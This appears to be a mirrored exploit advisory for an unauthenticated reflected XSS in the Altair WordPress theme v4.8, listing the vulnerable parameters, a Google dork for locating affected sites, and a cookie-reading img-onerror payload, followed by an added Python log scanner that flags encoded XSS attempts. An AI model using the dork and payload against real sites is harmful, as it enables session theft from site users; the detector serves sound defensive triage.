Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110068
Below is a copy:
Altair WordPress theme v4.8 – Unauthenticated Reflected XSS
[+] :: Exploit Title: Altair WordPress theme v4.8 - Unauthenticated Reflected XSS
[+] :: Google Dork: inurl:/wp-content/themes/altair/
[+] :: Date: 2020-09-10
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: ThemeGoods [ https://themegoods.com ]
[+] :: Software Version: 4.8
[+] :: Software Link: https://themeforest.net/item/tour-travel-agency-altair-theme/9318575
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79

[i] :: Info:
An Unauthenticated Reflected XSS vulnerability was discovered in the Altair theme v4.8 for WordPress.
Vulnerable parameters: keyword, start_date, start_date_raw, end_date, end_date_raw, budget.

[$] :: Payload:
"><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);>

[!] :: PoC:
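
For triage on a site running this theme, the check below flags access-log requests in which one of the six listed parameters carries markup characters after URL decoding. It is an added example, not part of the original advisory or the author's PoC; the combined access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory lists as vulnerable.
PARAMS = {"keyword", "start_date", "start_date_raw",
          "end_date", "end_date_raw", "budget"}
# Heuristic: characters or tokens needed to leave an attribute or start markup.
MARKUP = re.compile(r"""[<>"`]|\bon\w+\s*=|javascript:""", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2020:10:00:00 +0000] '
    '"GET /?s=&keyword=paris&start_date=2020-10-01&budget=500 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Sep/2020:10:00:05 +0000] '
    '"GET /?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 5200',
    '203.0.113.9 - - [10/Sep/2020:10:00:09 +0000] '
    '"GET /?end_date_raw=%2522%253E%253Csvg%253E&page=%3Cb%3E HTTP/1.1" 200 5200',
]

def suspicious_params(url):
    """Return sorted (name, decoded value) pairs for listed parameters with markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if name in PARAMS and MARKUP.search(decoded):
            hits.append((name, decoded))
    return sorted(hits)

def scan(lines):
    """Return (line number, hits) for every log line with at least one hit."""
    results = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match is None:
            continue  # not a request line in the assumed format
        hits = suspicious_params(match.group(1))
        if hits:
            results.append((number, hits))
    return results

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

A hit only shows that markup was sent in one of these parameters; whether it was reflected unescaped depends on the installed theme version. The durable fix is the theme escaping these values on output.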